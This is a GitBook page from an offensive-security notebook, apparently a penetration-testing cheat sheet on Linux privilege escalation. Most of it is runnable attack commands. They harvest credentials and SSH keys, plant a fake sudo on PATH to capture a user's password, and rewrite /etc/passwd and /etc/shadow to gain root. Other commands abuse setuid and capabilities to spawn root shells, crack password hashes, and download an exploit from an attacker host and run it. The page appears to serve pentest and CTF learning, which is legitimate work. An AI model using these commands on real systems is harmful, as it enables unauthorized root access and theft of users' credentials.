Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page
  • Automation
  • Messages When Logged In
  • OS Information
  • Interesting Information
  • Kernel Information
  • Open Ports
  • Running Processes
  • Process Tracing
  • Running Services
  • Sensitive Files with Given Keywords
  • SUID/SGID (Set User ID/ Set Group ID)
  • Writable Directories & Files
  • Capabilities
  • Set Capabilities
  • Override /etc/passwd, /etc/shadow
  • Sensitive Contents in Files
  • Disks (Drives)
  • Crack User Passwords
  • Execute Commands as Root Privilege
  • Update Sensitive Information
  • Display the Content of Files You Don't Have Permissions
  • Password Guessing from Old One
  • References

Linux Privilege Escalation

Privilege Escalation (PrivEsc) is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are

PreviousLXC/LXD (Linux Container/Daemon) Privilege EscalationNextMozilla Pentesting

Last updated 1 year ago

There are some tools for investigating automatically.

After logged in the target system, don’t miss the messages. We might find interesting information.

hostname
# Alias
hostname -a
# DNS
hostname -d
# IP address for the host name
hostname -i
# All IP address for the host
hostname -I

uname -a
# Kernel release
uname -r
# Kernel version
uname -v
# OS
uname -o

# OS kernel version
cat /proc/version
cat /etc/*release

# Current user
whoami
id
groups

# Environments
env
echo $PATH

# LSB (Linux Standard Base) and distribution information
lsb_release -a

# Positional arguments
echo $0
echo $1
echo $2
Copied!

If we run uname -a and get the OS version, search vulnerabilities.

Linux examplehost 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
Copied!

For example above, we can search ubuntu 4.4.0-31-generic in search engines.

# Bash files
# If we have the write permission for .bashrc or .profile, 
# we can write arbitrary command to any line in that files.
/home/<user>/.bash_history
/home/<user>/.bash_logout
/home/<user>/.bashrc
/home/<user>/.profile

# Authentication event logs
cat /var/log/auth.log | grep chpasswd
cat /var/log/auth.log | grep root
strings /var/log/auth.log | grep chpasswd
strings /var/log/auth.log | grep root

# Apache
cat /var/log/apache/access.log
cat /var/log/apache/error.log
cat /var/log/apache2/access.log
cat /var/log/apache2/error.log
cat /etc/apache2/.htpasswd
cat /etc/apache2/sites-enabled/domain.conf
cat /etc/apache2/sites-available/domain.conf
cat /etc/apache2/sites-available/000-default.conf
cat /usr/local/apache2/conf/httpd.conf
ls -al /usr/local/apache2/htdocs/

# Nginx
cat /var/log/nginx/access.log
cat /var/log/nginx/error.log
cat /etc/nginx/nginx.conf
cat /etc/nginx/conf.d/.htpasswd
cat /etc/nginx/sites-available/example.com.conf
cat /etc/nginx/sites-enabled/example.com.conf
cat /usr/local/nginx/conf/nginx.conf
cat /usr/local/etc/nginx/nginx.conf

# PHP web conf
cat /etc/php/x.x/apache2/php.ini
cat /etc/php/x.x/cli/php.ini
cat /etc/php/x.x/fpm/php.ini

# Bash Files
cat .bashrc
cat .bash_history
cat .bash_profile
cat .profile
cat /var/log/bash.log

# Cron jobs
cat /etc/cron*
cat /etc/crontab
cat /etc/cron.d/*
cat /etc/cron.daily/*
cat /etc/cron.hourly/*
cat /etc/cron.monthly/*
cat /etc/cron.weekly/*
cat /var/spool/cron/*
cat /var/spool/cron/crontabs/*
# List all cron jobs
crontab -l
crontab -l -u username

# Hosts
cat /etc/hosts
# LDAP config
cat /etc/ldap/ldap.conf
# Messages
cat /etc/issue
cat /etc/motd

# MySQL (MariaDB)
cat /etc/mysql/my.cnf
cat /etc/mysql/debian.cnf
cat /etc/mysql/mariadb.cnf
cat /etc/mysql/conf.d/mysql.cnf
cat /etc/mysql/mysql.conf.d/mysql.cnf

# Nameserver
cat /etc/resolv.conf
# NFS settings
cat /etc/exports
# PAM
cat /etc/pam.d/passwd
# Sudo config
cat /etc/sudoers
cat /etc/sudoers.d/usersgroup
# SSH config
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
# Users and passwords
cat /etc/passwd
cat /etc/shadow
# List of all groups on the system
cat /etc/group

# File system table
cat /etc/fstab

# Xpad (sensitive information e.g. user password)
cat .config/xpad/*

# SSH keys
ls -la /home /root /etc/ssh /home/*/.ssh/; locate id_rsa; locate id_dsa; find / -name id_rsa 2> /dev/null; find / -name id_dsa 2> /dev/null; find / -name authorized_keys 2> /dev/null; cat /home/*/.ssh/id_rsa; cat /home/*/.ssh/id_dsa

# Root folder of web server
ls /var/www/

# Sometimes, we find something...
ls -la /opt/
ls -la /srv/

# Temporary files
ls -la /dev/shm/
ls -la /tmp

# Services
ls -al /etc/systemd/system/
ls -al /lib/systemd/system/
cat /etc/inetd.conf

# Mails
ls -la /var/mail
ls -la /var/spool/mail

# Security policies
ls -la /etc/apparmor.d/

# Routing table
ip route show
# -r: route
# -n: don't resolve name
netstat -rn

# Check outdated packages
apt list --upgradable
apt list --upgradable | grep polkit
Copied!

# List kernel modules
lsmod
cat /proc/modules

# List symbols and addresses of kernel modules
cat /proc/kallsyms

# CPU information
cat /proc/cpuinfo

# Secuirty properties
checksec --kernel <module>
# e.g.
checksec --kernel bzImage

# Kernel logs
dmesg

# --human: Human readable output
dmesg --human
# --follow: Wait for new messages
dmesg --follow

# -f: Restrict defined facilities
dmesg -f auth
dmesg -f kern
dmesg -l mail
dmesg -l syslog
dmesg -f user

# -l: Restrict defined levels
dmesg -l alert
dmesg -l crit
dmesg -l err
dmesg -l info
dmesg -l user
Copied!

# -p: display PID/Program name for sockets
# -u: udp
# -n: don't resolve names
# -t: tcp
# -a: display all sockets
netstat -punta
# Filter only LISTEN ports
netstat -punta | grep -i listen

# -l: Display listening sockets
# -n: Don't resolve service names
# -t: TCP only
# -u: UDP only
ss -lntu
# -p: Show process using sockets
ss -nptu
Copied!

If we discover a listen port that cannot be accessed externally as below, we can access this port by port forwarding.

tcp  0  0  127.0.0.1:8080  0.0.0.0:*  LISTEN  -                   
Copied!

There are various methods to do that.

  • Method 1. Using Socat

    In remote machine, download the socat and run it.

    # we need to download the socat binary file from local machine
    wget http://<local-ip>:<local-port>/socat
    chmod +x socat
    socat tcp-listen:8090,fork,reuseaddr tcp:localhost:8080
    Copied!
  • Method 2. Using SSH Tunnel (SSH credential required)

    In local machine, run the ‘ssh -L’.

    ssh -L 8090:localhost:8080 remote-user@<remote-ip>
    Copied!

Now we can access to http://<remote-ip>:8090/ in local machine and actually can get the content of http://<remote-ip>:8080/.

lsof
sudo lsof
# -l: List UID numbers
lsof -l
sudo lsof -l
# -i: Select by IPv[46] address
lsof -i :80
sudo lsof -i :80
lsof -i :443
sudo lsof -i :443

# Display the currently-running processes.
ps
ps aux
ps aux | grep ping
# If the right side of the result is cut off, pipe with cat command.
ps aux | cat
ps aux | cat | grep ping
Copied!
./pspy64

# -p: print commands to stdout
# -f: print file system events to stdout
# -i: interval in milliseconds
./pspy64 -pf -i 1000
Copied!

If some process (like ping) is running as root, you may be able to capture the interesting information using tcpdump.

# -i lo: specify interface (lo: loopback address, localhost)
# -A: print each packet in ASCII
tcpdump -i lo -A
Copied!

If some command is executed in processes as our current user, we can override the command to our arbitrary command. Assume sudo cat /etc/shadow command is executed in the process. sudo command asks the password of the current user. So if we don't have the current user's password yet, worth getting the password.

To do so, we can create the fake sudo command under the current user’s home directory.

mkdir /home/<user>/bin
touch /home/<user>/bin/sudo
chmod +x /home/<user>/bin/sudo
Copied!

Then insert a payload in /home/<user>/bin/sudo. This sudo command reads the value of the password in prompt and write the value to “password.txt”.

#!/bin/bash

read password
echo $password >> /home/<user>/password.txt
Copied!

In addition, we need to export the /home/<user>/bin to the PATH on the top of the /home/<user>/.bashrc.

export PATH=/home/<user>/bin:$PATH
Copied!

Wait a while, we should see the “password.txt” is created.

cat password.txt
Copied!

Now we get the current user password.

Sometimes we can retrieve the sensitive information by reading sequential processes with stract.

strace -e read -p `ps -ef | grep php | awk '{print $2}'`
Copied!

To list all running services in Linux, use the following command.

systemctl --type=service --state=running
Copied!

Using journalctl, we can see logs of services running on systemd.

# All logs
journalctl

# Current boot
journalctl -b

# Kernel messages from boot
journalctl -k

# Recenct logs
# -e: Jump to the end in the pager
# -x: Details
journalctl -e
journalctl -ex

# Shog logs from specified unit
journalctl -u httpd
journalctl -u sshd
Copied!

The "find" command searches files in the real system.

find / -name "*.txt" 2>/dev/null
find /opt -name "*.txt" 2>/dev/null
find / -name "passwd" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
find / -name "users" 2>/dev/null
find / -name "*user*" 2>/dev/null
find / -name "secret.key" -or -name "secret" 2>/dev/null
find / -name "credential*.txt" 2>/dev/null
find / -name "*secret*" -or -name "*credential*" 2>/dev/null
find / -name "*root*" -or -name "*password*" 2>/dev/null
find / -name "*.key" -or -name "*.db" 2>/dev/null
find / -name "*data*" 2>/dev/null
find / -name ".env" 2>/dev/null
find / -name "*flag*" 2>/dev/null

# SQL files
find / -name "*.sql" 2>/dev/null
strings example.sql

# Backup files may contain sensitive information
find / -name "*backup*" 2>/dev/null
find / -name "*.bak*" 2>/dev/null
find / -name "*.back*" 2>/dev/null
find / -name "*.old" 2>/dev/null

# Histories
find / -name "*history*" 2>/dev/null

# Backup files for /etc/shadow.
# ex. /var/shadow.bak
find / -name *shadow* 2>/dev/null

# Kerberos
find / -name "*.keytab" 2>/dev/null


# ----------------------------------------
# Find more faster than `find` command.
locate data
locate flag
locate flag*.txt
locate *flag*
locate password
locate *password*
locate *save*
locate *save.txt
locate user.txt
locate user*
locate *user*
locate root.txt
locate *root*
locate .db
locate .txt
Copied!

We can exclude specific directory with -not -path option of find command.

find / -name "*.txt" -not -path "/usr/share" 2>/dev/null
Copied!

It allows users to run an executable as root privilege.

# SUID
find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -04000 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

# SGID
find / -type f -perm -g=s 2>/dev/null
find / -type f -perm -02000 2>/dev/null
find / -user root -perm -2000 -exec ls -ldb {} \; 2>/dev/null
Copied!

If the "find" command is set as SUID, you can execute some commands as root privileges.

find ./ -exec "whoami" \;
find /etc/shadow -exec cat {} \;
find /root -exec ls -al {} \;
Copied!

If the "cputils" is set as SUID, you can copy the sensitive file to another one.

cputils

Enter the name of source file: /home/<user>/.ssh/id_rsa
Enter the name of target file: /tmp/id_rsa
Copied!
  1. Copy /etc/passwd and Update the Root Line

cp /etc/passwd .
vim passwd
Copied!

Then update "root:x:..." to "root:password123:...".

  1. Replace with Our New Passwd File

Using pandoc command, we can replace the original /etc/passwd with our updated passwd file.

pandoc ./passwd -t plain -o /etc/passwd
Copied!

Now we can login as root using new password.

su root
Password: password123
Copied!
# Download it in local machine
wget https://www.openwall.com/lists/oss-security/2022/06/08/10/1 -O exploit.py

# Transfer it to target machine
wget http://<local-ip>:8000/exploit.py
python3 exploit.py &
firejail --join=<PID>
su -
Copied!

# Writable directories
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | sort -u

# System service files
find / -writable -name "*.service" 2>/dev/null
Copied!

To find files that are set capabilities.

getcap -r / 2>/dev/null
Copied!

First we need to check the current user id by executing 'id' command.

id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
Copied!

Then execute the following command to modify the file owner to the current user. Replace the attribute numbers with the current user id.

# Python
python -c 'import os;os.chown("/etc/shadow",33,33)'

# Ruby
ruby -e 'require "fileutils"; FileUtils.chown(33, 33, "/etc/shadow")'
# directories also can be modified.
ruby -e 'require "fileutils"; FileUtils.chown(33, 33, "/root")'
Copied!
# Perl
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

# PHP
php -r "posix_setuid(0); system('$CMD');"

# Python
python -c 'import os; os.setuid(0); os.system("/bin/bash")'
Copied!
# Tcpdump - we can sniff sensitive information by running tcpdump for a while.
tcpdump -i lo -A
Copied!

Bypass file read permission checks and directory read and execute permission checks.

# Tar (https://gtfobins.github.io/gtfobins/tar/)
LFILE=/etc/shadow
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
Copied!

setcap cap_setuid+ep /path/to/binary
Copied!

If you found the setcap with SUID, you can manipulate commands like Python.

cp /usr/bin/python3 /home/<current-user>/python3
setcap cap_setuid+ep /home/<current-user>/python3
Copied!

Then get a root shell.

/home/<current-user>/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Copied!

If we have write permission of /etc/passwd by some means, we can modify this file as desired for us. First check the content of that file with cat /etc/passwd.

root:x:0:0:root:/root:/bin/sh
...
Copied!

By removing this x character in the root line, we can become root without password. Below

root::0:0:root:/root:/bin/sh
...
Copied!

After that, we can get a shell as root using the following command.

su root
Copied!

If we have write permission of /etc/shadow by some means, we can modify the password for each user. First of all, create a new password using openssl.


# -6: sha512 algorithm
# password: this is the root password
openssl passwd -6 salt=salt password

# output
$6$salt$IxDD3jeSOb5eB1CX5LBsqZFVkJdido3OUILO5Ifz5iwMuTS4XMS130MTSuDDl3aCI6WouIL9AjRbLCelDCy.g.
Copied!

After generating the hash, update the root password hash to this hash ($6$salt$I…) in /etc/shadow.

root:$6$salt$IxDD3jeSOb5eB1CX5LBsqZFVkJdido3OUILO5Ifz5iwMuTS4XMS130MTSuDDl3aCI6WouIL9AjRbLCelDCy.g.:19532:0:99999:7:::
Copied!

Now we can get a shell as root with the password "password".

su root
# password: password
Copied!

# -r: recursive
# -n: line number
# -i: ignore case
grep -rni root ./
grep -rni password ./
grep -rni passwd ./
grep -rni db_password ./
grep -rni db_passwd ./

# Find user's information
grep -rni root ./
grep -rni john ./

# -e: OR Searching
grep -re admin -re root -re credential -re password ./
grep -re secret -re key ./

# -v: Exclude
grep -rni password -v node_modules ./

# -E: regex
grep -riE 'flag{.*}' ./

# IP Address Searching
grep -rE -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" ./

# -h: no output filenames
grep -h root ./
Copied!

List disks information on the target system.

# Find mounted folders
findmnt
# List information about block drives
lsblk
# or
fdisk -l
# or
ls -al /dev | grep disk

# --------------------------------------------------

# Result examples
NAME    MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
xvda    202:0    0  40G  0 disk 
└─xvda1 202:1    0  40G  0 part /etc/hosts
Copied!

If we find the drives, we can mount it.

mkdir -p /mnt/tmp
mount /dev/xvda1 /mnt/tmp
Copied!

If we can access /etc/passwd and /etc/shadow as well, we can crack user passwords using unshadow and John The Ripper.

cp /etc/passwd ./passwd.txt
cp /etc/shadow ./shadow.txt
Copied!
unshadow passwd.txt shadow.txt > passwords.txt
Copied!
john --wordlist=wordlist.txt passwords.txt

# If the hash in /etc/shadow contains the $y$ prefix, specify the hash format to "crypt".
# btw, $ye$ is the scheme of the yescrypt.
john --format=crypt --wordlist=wordlist.txt passwords.txt
Copied!

Add "-p" option at the first line to execute the script as root privilege.

#!/bin/bash -p
whoami
Copied!

If you can change permission of the /bin/bash , add SUID to the file.

chmod 4755 /bin/bash
Copied!

Then you execute it as root privilege by adding "-p" option. You'll be able to pwn the target shell.

user@machine:~/$ /bin/bash -p
root@machine:~/$ whoami
root
Copied!

We need to know the current user's password.

echo -n '<current-password>\n<new-password>\n<new-password>' | passwd
Copied!
  1. Generate New Password

    # -6: SHA512
    openssl passwd -6 -salt salt password
    Copied!

    Copy the output hash.

  2. Add New Line to /etc/shadow in Target Machine

    You need to do as root privileges.

    echo '<new-user-name>:<generated-password-hash>:19115:0:99999:7:::' >> /etc/shadow
    Copied!
  3. Switch to New User

    To confirm, switch to generated new user.

    su <new-user>
    Copied!

Using "more" command.

The text like "--More--(60%)" will be appeared.

password2021 -> password2022, password2023
april123 -> may123, june123
apple -> banana, orange
Copied!

References

By using , you can fetch processes without root privileges.

If you'll get some SUID files, research the information of them using .

is useful.

Automation
LinPEAS
Linux Exploit Suggester
Linux Smart Enumeration
Messages When Logged In
OS Information
Find OS/Kernel Vulnerability
Interesting Information
Kernel Information
Open Ports
Access open ports that cannot be accessed from outside
Running Processes
pspy
Dump Information
Override Command
Process Tracing
Running Services
Service Logs
Sensitive Files with Given Keywords
Exclude Path
SUID/SGID (Set User ID/ Set Group ID)
GTFOBins
Find
Cputils
Pandoc
Firejail
This exploit
Writable Directories & Files
Capabilities
cap_chown
cap_setuid
cap_net_raw
cap_dac_read_search
Set Capabilities
Override /etc/passwd, /etc/shadow
/etc/passwd
/etc/shadow
Sensitive Contents in Files
Disks (Drives)
Crack User Passwords
1. Copy Files
2. Combines Two Files
3. Crack Passwords
Execute Commands as Root Privilege
Change Shebang in Shell Script
Use the Set User ID (SUID)
Update Sensitive Information
1. Change Password of Current User
2. Add Another Root User to /etc/shadow
Display the Content of Files You Don't Have Permissions
1. Make the Terminal's Window Size Smaller
2. Run "more" Command
3. Press 'v' on Keyboard to Enter Vim Mode
4. Enter ':e ~/somefile'
Password Guessing from Old One
https://book.hacktricks.xyz/linux-hardening/privilege-escalation
Page cover image